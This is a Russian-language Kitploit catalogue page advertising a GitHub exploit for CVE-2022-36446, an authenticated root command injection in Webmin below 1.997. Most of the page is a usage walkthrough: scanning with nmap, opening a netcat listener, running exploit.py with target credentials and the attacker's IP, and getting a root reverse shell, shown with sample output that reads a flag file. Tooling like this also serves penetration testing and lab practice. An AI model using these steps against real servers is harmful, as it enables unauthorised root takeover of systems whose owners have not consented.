Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-36446-Webmin-RCE — Эксплойт для аутентифицированного удалённого выполнения кода в Webmin < 1.997 через модуль обновления программных пакетов. Внедряет произвольные команды с правами root через несанитизированный параметр, обеспечивая обратную оболочку. | Kitploit
Инструменты/GitHubGitHub/darnabin/cve-2022-36446-webmin-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubdarnabin/cve-2022-36446-webmin-rce

CVE-2022-36446-Webmin-RCE

Эксплойт для аутентифицированного удалённого выполнения кода в Webmin < 1.997 через модуль обновления программных пакетов. Внедряет произвольные команды с правами root через несанитизированный параметр, обеспечивая обратную оболочку.

Репозиторий
242 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-36446 — Webmin < 1.997 RCE (Authenticated)

Эксплойт для уязвимости Remote Code Execution в Webmin версиях старше 1.997, через модуль Software Package Updates.

Как это работает?

Модуль Software Package Updates Webmin не санитизирует должным образом параметр u перед передачей его системе. Аутентифицированный пользователь с доступом к этому модулю может внедрить произвольные команды, которые выполняются от root.


Предварительные требования

Установите зависимости перед запуском эксплойта:

pip3 install requests beautifulsoup4 lxml urllib3

Параметры

ПараметрОписаниеПример
-tURL цели (без порта)https://192.168.1.10
-uПользователь Webminadmin
-pПароль Webminpassword123
-lВаш IP (где вы принимаете shell)192.168.1.5
-lpПорт для прослушивания4444

Пошаговая инструкция

1 — Определите IP цели с помощью Nmap:

nmap -sV TARGET_IP
# Ищите порт 10000 с Webmin

2 — Откройте слушатель на вашей машине:

nc -lvnp 4444

3 — В другом терминале запустите эксплойт:

python3 exploit.py \
  -t https://TARGET_IP \
  -u admin \
  -p PASSWORD \
  -l ТВОЙ_IP \
  -lp 4444

4 — Если эксплойт успешен, вы увидите:

5 — На слушателе вы получите shell от root:

# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}

Полный пример

# Терминал 1
nc -lvnp 4444

# Терминал 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444

Ссылка

  • CVE: CVE-2022-36446
  • CVSS Score: 9.9 (Critical)
  • Уязвимая версия: Webmin < 1.997
  • Оригинальный эксплойт: https://www.exploit-db.com/exploits/50998
  • Оригинальный автор: Emir Polat
Скачать инструмент